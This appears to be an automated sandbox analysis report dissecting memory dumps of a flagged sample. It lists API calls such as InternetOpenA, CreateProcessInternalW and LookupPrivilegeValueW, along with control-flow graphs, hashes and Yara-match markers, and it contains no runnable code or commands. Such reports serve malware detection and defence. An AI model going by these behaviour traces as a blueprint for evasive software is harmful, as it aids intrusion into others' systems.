                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                          • API String ID: 2038078732-3155091674
                                          • Opcode ID: 1b5daa21db1951ebb0a36a7e0f7e4bb2de83bfe8520b373173d7edd24bc5b95e
                                          • Instruction ID: 0d8199b19a79f256410859585f4de181fdf26380a3cef7a7e6f3c406db967e75
                                          • Opcode Fuzzy Hash: 1b5daa21db1951ebb0a36a7e0f7e4bb2de83bfe8520b373173d7edd24bc5b95e
                                          • Instruction Fuzzy Hash: 3EF03CB2911118AF8B14DF98D841DEB7BB9FF48310F148589FE58A7311E630AA518BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 376 2a89080-2a890c2 call 2a8bd40 379 2a890c8-2a89118 call 2a8be10 call 2a7acf0 call 2a84e50 376->379 380 2a8919c-2a891a2 376->380 387 2a89120-2a89131 Sleep 379->387 388 2a89133-2a89139 387->388 389 2a89196-2a8919a 387->389 390 2a8913b-2a8915c call 2a88ca0 388->390 391 2a89163-2a89184 call 2a88eb0 388->391 389->380 389->387 394 2a89161 390->394 395 2a89189-2a8918c 391->395 394->395 395->389
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 02A89128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: b9bcff13a90b1ba5da00e8373b1a167007188958bc0109db7198ece4eb4567d8
                                          • Instruction ID: 89fb807d33808d4f59d21cac047f45fe7bdff8858959cf1dd4461da1d2dff6e9
                                          • Opcode Fuzzy Hash: b9bcff13a90b1ba5da00e8373b1a167007188958bc0109db7198ece4eb4567d8
                                          • Instruction Fuzzy Hash: C43181B2540345BBC714EF64C885F77B7B9BB48B00F00851DF62AAB245DB34B554CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 396 2a89077-2a890c2 call 2a8bd40 400 2a890c8-2a89118 call 2a8be10 call 2a7acf0 call 2a84e50 396->400 401 2a8919c-2a891a2 396->401 408 2a89120-2a89131 Sleep 400->408 409 2a89133-2a89139 408->409 410 2a89196-2a8919a 408->410 411 2a8913b-2a89161 call 2a88ca0 409->411 412 2a89163-2a89184 call 2a88eb0 409->412 410->401 410->408 416 2a89189-2a8918c 411->416 412->416 416->410
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 02A89128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 35f58ad24640e47bbf166df9fec5bf4f82bb783751ccfc450772771136f4143d
                                          • Instruction ID: e8ad444022eb6b8da77896a77512cd5e54fee84ecb68742fabcc4e2fcca444bc
                                          • Opcode Fuzzy Hash: 35f58ad24640e47bbf166df9fec5bf4f82bb783751ccfc450772771136f4143d
                                          • Instruction Fuzzy Hash: 6221C1B2940305BBC714EF64CCC5F7BB7B9FB48B04F008119E629AB285DB74A554CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A73AF8), ref: 02A8A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: f1d3e4b2d0ac60d2a99ca921de3bda0432a481a5ff4051c46ef9d454eb21188a
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: ACE04FB12002086BD714EF59CC44EA777ADEF88750F118559FD0C57241C630F910CAF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A7836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A7838B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 66398f3613db91332ac68618874db6c600fffb51e4998f08aea36f5e7e5188f1
                                          • Instruction ID: 7315865609ba452f0d54d43b213d991270a42e1ba75bb3bac08f64790bb4964c
                                          • Opcode Fuzzy Hash: 66398f3613db91332ac68618874db6c600fffb51e4998f08aea36f5e7e5188f1
                                          • Instruction Fuzzy Hash: BE01D432AC02287BE720AA94DD82FFE772D9B40B50F050154FF04BA1C1EAA869064BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A7836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A7838B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                          • Instruction ID: 58b15c0833288d20ac0d9c77a2c16d6450091104face3792cb1c5b190051d8ce
                                          • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                          • Instruction Fuzzy Hash: A801A232A802287BE720B6949D46FFE776D5B40F54F050159FF04BA1C1EAA869064BFA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A7AD62
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: 9526894d3558c415b75d924a7a8e444366463bf8bb2ee0157f3c7c8a9719e4f0
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: FF015EB5D4020DBBDF10EBA0DD81FDDB3799B04308F004595EA0897281FA31E7048B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A8A734
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 4bffac924a8efe3f76e8c16543759974bc5a34ef2ae5fc7275db5f35a3a90171
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: B701AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A8A734
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: eef9103121d579d30522e56b7f0902beac61e250371fd68b76095a2b2c29faff
                                          • Instruction ID: 2e870c08810269fa09f1c540bdd3232c9683f3ed56207c74892e7dd5c1e241b5
                                          • Opcode Fuzzy Hash: eef9103121d579d30522e56b7f0902beac61e250371fd68b76095a2b2c29faff
                                          • Instruction Fuzzy Hash: 3801F6B2205149BFCB54DF88DC80EEB77ADAF8C354F158249FA0D97251C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A7F050,?,?,00000000), ref: 02A891EC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 514acbfe814dae774e6785729ff0828b898ddd06b24f7590d82b321662d1b142
                                          • Instruction ID: 3ac02ac42f08e07d74be40612f099c5e359ecd60828f6f13cec34a494935b0ee
                                          • Opcode Fuzzy Hash: 514acbfe814dae774e6785729ff0828b898ddd06b24f7590d82b321662d1b142
                                          • Instruction Fuzzy Hash: BCE06D373802043AE6207599AC02FA7B29D8B81B20F550026FA4DEA6C0E995F40146A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(02A84536,?,02A84CAF,02A84CAF,?,02A84536,?,?,?,?,?,00000000,00000000,?), ref: 02A8A65D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: 2b0098762f3fb7836c1ec45c1d5b4c793ee64285fd138b0a81aecb7ac7e8f93f
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: 3EE012B2200208ABDB14EF99CC40EA777ADEF88654F118559BA085B242CA30F9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A7F1D2,02A7F1D2,?,00000000,?,?), ref: 02A8A800
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: ab53a13aaaba17df2864d090f87d140ed3cab89f5c5cadc6a2b1c3d7704de7fa
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 84E01AB12002086BDB10EF49CC84EE737ADEF88650F118155BA0C57241C934E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,02A78D14,?), ref: 02A7F6FB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction ID: 7911821a7bf4bdc314bbd60f674380e556b8ee5fa4f2e088de9f9e6464f7bfad
                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction Fuzzy Hash: 94D05E626903092AE610BAA49C02F6632C95B44A04F4A0064FA48D62C3ED50E1014565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d243f2813af7275ab7247c42cf77a7a5c8784be1b48a35f51acd562f74051e80
                                          • Instruction ID: 388b4bd5bed131a3895259046db351f2f9b7518b1da6fbf756d14c4da8a7d75e
                                          • Opcode Fuzzy Hash: d243f2813af7275ab7247c42cf77a7a5c8784be1b48a35f51acd562f74051e80
                                          • Instruction Fuzzy Hash: 73B04C719015C595EB11A760460961679506B90705F15C461E2024651A4728E591E175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04DC4742
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04DC4787
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04DC46FC
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04DC4725
                                          • ExecuteOptions, xrefs: 04DC46A0
                                          • Execute=1, xrefs: 04DC4713
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04DC4655
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 65a69d219c33270a71f380c64fc307748cad087480c6fc5f15482e1d54f58b9c
                                          • Instruction ID: 9a27db486afa8e48776dc57963d7ec1e1ceb59aab44b256b32b77291261e79af
                                          • Opcode Fuzzy Hash: 65a69d219c33270a71f380c64fc307748cad087480c6fc5f15482e1d54f58b9c
                                          • Instruction Fuzzy Hash: 7851E235740219BAEF10BBA59C96BBE77A8FF44305F2400ADE505A7280EB70BE458E60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: a65100f04a5b08ec286669183fb2fc62d6096d77569a9c22b5bc5d4db3801e91
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: 3D819E70E052499EDF24CE68E8917FEBBE2BF45310F1A465BD891EB290D634BC408B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 04DC031E
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04DC02BD
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04DC02E7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: db61b24b477986d8c4ea8e280d166ebe0f99964c251c3690eeb576804e9dcf66
                                          • Instruction ID: 2cee14a2b2ce9a13498a422990f9517b05151a694ce14526a7be257a20f438ba
                                          • Opcode Fuzzy Hash: db61b24b477986d8c4ea8e280d166ebe0f99964c251c3690eeb576804e9dcf66
                                          • Instruction Fuzzy Hash: F0E18C70604742DFDB25CF68C884B2AB7E0FB89328F140A5DE5A58B2E1E774F945CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04DC7B7F
                                          • RTL: Resource at %p, xrefs: 04DC7B8E
                                          • RTL: Re-Waiting, xrefs: 04DC7BAC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 598ae5ebc7c3153e2775a619c9a8d59fbf27cfdcb4efc784c8b5206fbfc93509
                                          • Instruction ID: f5a346ce49cc63349d9af065d269f1f5633f50d0fc4a9112a53f0a51b8e78737
                                          • Opcode Fuzzy Hash: 598ae5ebc7c3153e2775a619c9a8d59fbf27cfdcb4efc784c8b5206fbfc93509
                                          • Instruction Fuzzy Hash: F541CD357007029FDB21EE25C840B6AB7E5FB88724F100A1EF89ADB281DB31F8058F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DC728C
                                          Strings
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04DC7294
                                          • RTL: Resource at %p, xrefs: 04DC72A3
                                          • RTL: Re-Waiting, xrefs: 04DC72C1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: a4c504dea726d247b49db828e6e0809108f49e79d28bf491346692c6745e1d7f
                                          • Instruction ID: 1ae3b2225b88730f65470b8d4a3a801f66dd80b4e8d16140d849265e2e3dffc8
                                          • Opcode Fuzzy Hash: a4c504dea726d247b49db828e6e0809108f49e79d28bf491346692c6745e1d7f
                                          • Instruction Fuzzy Hash: 5941F031700203ABEB21EE25CC42B66B7A5FB84718F14061DF995EB280DB20F8069BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: 72d7e75977ec2894704f05b0a029ab14eff4f4d16f48327db01f41cba3d0e88d
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 07917D70F2021ADADF24DE69C881ABEB7E5FF45720F54461AE855E72C0E730AD409B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 7ab1105f5d6492c3c56c753b0c764f3d60036720e455792e458af5f7e76a9760
                                          • Instruction ID: 299c08e9f06ff7266431873e78c8f6039cdbbf8ab9fc58d169455869f7e9bb9e
                                          • Opcode Fuzzy Hash: 7ab1105f5d6492c3c56c753b0c764f3d60036720e455792e458af5f7e76a9760
                                          • Instruction Fuzzy Hash: 30812EB2D00269DBDB31DF54CC54BEEB7B4AB48754F0041DAA95AB7250E730AE85CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%